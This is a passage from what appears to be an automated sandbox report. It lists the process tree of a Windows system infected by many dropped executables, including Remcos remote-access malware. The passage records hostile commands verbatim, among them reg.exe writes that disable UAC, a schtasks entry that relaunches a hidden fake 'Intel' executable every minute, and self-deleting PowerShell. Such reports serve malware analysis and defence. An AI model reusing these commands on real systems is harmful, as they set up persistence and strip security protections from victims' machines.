                                    7z.exe e extracted/file_4.zip -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5292
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_3.zip -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5336
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_2.zip -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5400
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_1.zip -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2268
                                  • C:\Windows\system32\attrib.exe
                                    attrib +H "in.exe"
                                    4⤵
                                    • Views/modifies file attributes
                                    PID:5500
                                  • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                    "in.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5520
                                    • C:\Windows\system32\attrib.exe
                                      attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                      5⤵
                                      • Views/modifies file attributes
                                      PID:5580
                                    • C:\Windows\system32\attrib.exe
                                      attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                      5⤵
                                      • Views/modifies file attributes
                                      PID:5572
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                      5⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3924
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell ping 127.0.0.1; del in.exe
                                      5⤵
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:8432
                                      • C:\Windows\system32\PING.EXE
                                        "C:\Windows\system32\PING.EXE" 127.0.0.1
                                        6⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:6428
                              • C:\Users\Admin\AppData\Local\Temp\a\client.exe
                                "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:4700
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 4700 -s 636
                                  3⤵
                                    PID:4780
                                • C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:5916
                                  • C:\Users\Admin\AppData\Local\Temp\onefile_5916_133786977294628000\l4.exe
                                    C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:6452
                                • C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Drops file in Program Files directory
                                  • Modifies system certificate store
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:6408
                                  • C:\Program Files\Windows Media Player\graph\graph.exe
                                    "C:\Program Files\Windows Media Player\graph\graph.exe"
                                    3⤵
                                      PID:1676
                                  • C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
                                    "C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:7368
                                    • C:\Windows\system32\cmd.exe
                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                      3⤵
                                        PID:8656
                                        • C:\Windows\system32\mode.com
                                          mode 65,10
                                          4⤵
                                            PID:9156
                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                            7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                            4⤵
                                            • Executes dropped EXE
                                            PID:9180
                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                            7z.exe e extracted/file_7.zip -oextracted
                                            4⤵
                                            • Executes dropped EXE
                                            PID:9188
                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                            7z.exe e extracted/file_6.zip -oextracted
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2112
                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                            7z.exe e extracted/file_5.zip -oextracted
                                            4⤵
                                              PID:8708
                                            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                              7z.exe e extracted/file_4.zip -oextracted
                                              4⤵
                                                PID:1208
                                              • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                7z.exe e extracted/file_3.zip -oextracted
                                                4⤵
                                                  PID:8888
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_2.zip -oextracted
                                                  4⤵
                                                    PID:9120
                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                    7z.exe e extracted/file_1.zip -oextracted
                                                    4⤵
                                                      PID:8636
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +H "in.exe"
                                                      4⤵
                                                      • Views/modifies file attributes
                                                      PID:1696
                                                    • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                                      "in.exe"
                                                      4⤵
                                                        PID:604
                                                        • C:\Windows\system32\attrib.exe
                                                          attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                          5⤵
                                                          • Views/modifies file attributes
                                                          PID:2888
                                                        • C:\Windows\system32\attrib.exe
                                                          attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                          5⤵
                                                          • Views/modifies file attributes
                                                          PID:2164
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                          5⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:800
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell ping 127.0.0.1; del in.exe
                                                          5⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          PID:532
                                                          • C:\Windows\system32\PING.EXE
                                                            "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                            6⤵
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            • Runs ping.exe
                                                            PID:2988
                                                  • C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:7956
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7956 -s 660
                                                      3⤵
                                                      • Program crash
                                                      PID:4756
                                                  • C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:8488
                                                  • C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
                                                    2⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Checks processor information in registry
                                                    PID:4872
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFE1D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpFE1D.tmp.bat
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:8272
                                                  • C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
                                                    2⤵
                                                    • Adds Run key to start application
                                                    • Drops file in Program Files directory
                                                    PID:3932
                                                    • C:\Program Files\Windows Media Player\graph\graph.exe
                                                      "C:\Program Files\Windows Media Player\graph\graph.exe"
                                                      3⤵
                                                        PID:2684
                                                    • C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
                                                      2⤵
                                                      • Adds policy Run key to start application
                                                      • Adds Run key to start application
                                                      • System Location Discovery: System Language Discovery
                                                      PID:8500
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:6004
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                          4⤵
                                                          • UAC bypass
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies registry key
                                                          PID:6224
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:6304
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2732
                                                          • C:\ProgramData\Remcos\remcos.exe
                                                            C:\ProgramData\Remcos\remcos.exe
                                                            5⤵
                                                            • Adds policy Run key to start application
                                                            • Adds Run key to start application
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:6376
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                              6⤵
                                                                PID:2572
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                  7⤵
                                                                  • UAC bypass
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies registry key
                                                                  PID:7008
                                                              • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                6⤵
                                                                • Adds policy Run key to start application
                                                                • Adds Run key to start application
                                                                • Suspicious use of SetThreadContext
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: MapViewOfSection
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:6312
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:7064
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                    8⤵
                                                                    • UAC bypass
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies registry key
                                                                    PID:6356
                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                  svchost.exe
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2804
                                                                  • C:\ProgramData\Remcos\remcos.exe
                                                                    "C:\ProgramData\Remcos\remcos.exe"
                                                                    8⤵
                                                                    • Adds policy Run key to start application
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:4140
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                      9⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3108
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                        10⤵
                                                                        • UAC bypass
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies registry key
                                                                        PID:4544
                                                                    • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                      "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                      9⤵
                                                                      • Adds policy Run key to start application
                                                                      • Adds Run key to start application
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:3116
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                        10⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4348
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                          11⤵
                                                                          • UAC bypass
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Modifies registry key
                                                                          PID:4624
                                                                  • C:\ProgramData\Remcos\remcos.exe
                                                                    "C:\ProgramData\Remcos\remcos.exe"
                                                                    8⤵
                                                                    • Adds policy Run key to start application
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:6576
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                      9⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:6604
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                        10⤵
                                                                        • UAC bypass
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies registry key
                                                                        PID:3424
                                                                    • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                      "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                      9⤵
                                                                      • Adds policy Run key to start application
                                                                      • Adds Run key to start application
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6436
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                        10⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:6720
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                          11⤵
                                                                          • UAC bypass
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Modifies registry key
                                                                          PID:3336
                                                      • C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
                                                        2⤵
                                                        • Drops file in Program Files directory
                                                        PID:2708
                                                        • C:\Windows\System32\certutil.exe
                                                          "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp762.tmp"
                                                          3⤵
                                                            PID:1784
                                                        • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2256
                                                          • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:8052
                                                      • C:\Windows\system32\msiexec.exe
                                                        C:\Windows\system32\msiexec.exe /V
                                                        1⤵
                                                        • Blocklisted process makes network request
                                                        • Adds Run key to start application
                                                        • Enumerates connected drives
                                                        • Drops file in Windows directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6804
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 86F3BB8553A7F4C1CE815233DF5C81AA C
                                                          2⤵
                                                          • Loads dropped DLL
                                                          • Drops file in Windows directory
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6920
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 2449F8A77DB6A87D22B117B2ADA16E86
                                                          2⤵
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1064
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            rundll32.exe "C:\Windows\Installer\MSIC837.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259573838 1 CustomActions!CustomActions.CustomActions.StartApp
                                                            3⤵
                                                            • Loads dropped DLL
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1908
                                                            • C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
                                                              "C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
                                                              4⤵
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Sets desktop wallpaper using registry
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies Control Panel
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:1004
                                                              • C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe
                                                                "C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe" "{\"BWCU\":{\"fileName\":\"BWCUpdater.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCU/2.0.1.4/BWCUpdater.exe\",\"startApp\":\"BWApp\",\"forcelaunch\":\"0\",\"isMajorUpdate\":\"1\",\"BWCI\":{\"fileName\":\"BWCStartMSI.exe\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCI/2.0.1.4/BWCStartMSI.exe\"},\"Components\":{\"BWApp\":{\"fileName\":\"BingWallpaperApp.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWApp/2.0.1.4/BingWallpaperApp.exe\"},\"VSCM\":{\"fileName\":\"BingVisualSearchContextMenu.dll\",\"version\":\"1.0.7.8\",\"isMoveToTempRequired\":\"1\",\"optional\":\"IsVSEnabled\",\"downloadURL32\":\"https://go.microsoft.com/fwlink/?linkid=2142132\",\"downloadURL64\":\"https://go.microsoft.com/fwlink/?linkid=2142305\"},\"VSBL\":{\"fileName\":\"BingVisualSearchLauncher.exe\",\"version\":\"1.0.7.8\",\"optional\":\"IsVSEnabled\",\"downloadURL\":\"https://go.microsoft.com/fwlink/?linkid=2142207\"}}},\"hpwpdownloadAPI\":\"https://go.microsoft.com/fwlink/?linkid=2151983\",\"switch\":\"\",\"hbInterval\":\"1\",\"notifyAppInstall\":\"1\",\"notifyDailyRefresh\":\"1\",\"showNotificationAll\":\"1\",\"showImageNotification\":\"1\",\"showRecommendations\":\"1\",\"enableExtension\":\"1\",\"ShareSwitch\":\"1\",\"BNPSignal\":{\"ScanInterval\":\"12\",\"SendSignalOnChange\":1,\"ScheduledSignalInterval\":\"3\",\"SupportedBrowsers\":\"000\",\"APISwitch\":1},\"MEReset\":{\"Delay\":3,\"Type\":{\"NewUsers\":1,\"ExistingUsers\":1}}}"
                                                                5⤵
                                                                  PID:6116
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              rundll32.exe "C:\Windows\Installer\MSICC0E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259575040 7 CustomActions!CustomActions.CustomActions.InstallPing
                                                              3⤵
                                                              • Blocklisted process makes network request
                                                              • Checks computer location settings
                                                              • Loads dropped DLL
                                                              • Drops file in Windows directory
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:3380
                                                          • C:\Windows\syswow64\MsiExec.exe
                                                            C:\Windows\syswow64\MsiExec.exe -Embedding C172B12E59B620CAF85F08E9DEA4BA1D C
                                                            2⤵
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3960
                                                        • C:\Windows\system32\taskeng.exe
                                                          taskeng.exe {2CF4428E-56FB-4D7F-86AA-B3F82BCBE96D} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
                                                          1⤵
                                                            PID:5832
                                                            • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                              C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                              2⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:5776
                                                              • C:\Windows\explorer.exe
                                                                explorer.exe
                                                                3⤵
                                                                  PID:5764
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                  3⤵
                                                                  • Drops file in System32 directory
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  PID:5676
                                                                  • C:\Windows\system32\PING.EXE
                                                                    "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                    4⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:5424
                                                              • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:8056
                                                                • C:\Windows\explorer.exe
                                                                  explorer.exe
                                                                  3⤵
                                                                    PID:8100
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                    3⤵
                                                                    • Drops file in System32 directory
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    PID:8152
                                                                    • C:\Windows\system32\PING.EXE
                                                                      "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                      4⤵
                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                      • Runs ping.exe
                                                                      PID:8356
                                                                • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                  C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                  2⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:2424
                                                                  • C:\Windows\explorer.exe
                                                                    explorer.exe
                                                                    3⤵
                                                                      PID:3064
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                      3⤵
                                                                      • Drops file in System32 directory
                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                      PID:3364
                                                                      • C:\Windows\system32\PING.EXE
                                                                        "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                        4⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Runs ping.exe
                                                                        PID:3732
                                                                  • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                    C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                    2⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:1448
                                                                    • C:\Windows\explorer.exe
                                                                      explorer.exe
                                                                      3⤵
                                                                        PID:2380
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                        3⤵
                                                                        • Drops file in System32 directory
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        PID:1580
                                                                        • C:\Windows\system32\PING.EXE
                                                                          "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                          4⤵
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          • Runs ping.exe
                                                                          PID:5608
                                                                    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                      C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                      2⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5404
                                                                      • C:\Windows\explorer.exe
                                                                        explorer.exe
                                                                        3⤵
                                                                          PID:5424
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                          3⤵
                                                                          • Drops file in System32 directory
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          PID:5512
                                                                          • C:\Windows\system32\PING.EXE
                                                                            "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                            4⤵
                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                            • Runs ping.exe
                                                                            PID:5172
                                                                      • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                        C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                        2⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:7820
                                                                        • C:\Windows\explorer.exe
                                                                          explorer.exe
                                                                          3⤵
                                                                            PID:7460
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                            3⤵
                                                                            • Drops file in System32 directory
                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                            PID:1896
                                                                            • C:\Windows\system32\PING.EXE
                                                                              "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                              4⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:7700
                                                                        • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                          C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:704
                                                                          • C:\Windows\explorer.exe
                                                                            explorer.exe
                                                                            3⤵
                                                                              PID:1756
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                              3⤵
                                                                              • Drops file in System32 directory
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              PID:1140
                                                                              • C:\Windows\system32\PING.EXE
                                                                                "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                4⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:7308
                                                                          • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                            C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:7152
                                                                            • C:\Windows\explorer.exe
                                                                              explorer.exe
                                                                              3⤵
                                                                                PID:5084
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                3⤵
                                                                                • Drops file in System32 directory
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                PID:1936
                                                                                • C:\Windows\system32\PING.EXE
                                                                                  "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                  4⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  • Runs ping.exe
                                                                                  PID:6956
                                                                            • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                              C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4232
                                                                              • C:\Windows\explorer.exe
                                                                                explorer.exe
                                                                                3⤵
                                                                                  PID:4616
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                  3⤵
                                                                                  • Drops file in System32 directory
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:5312
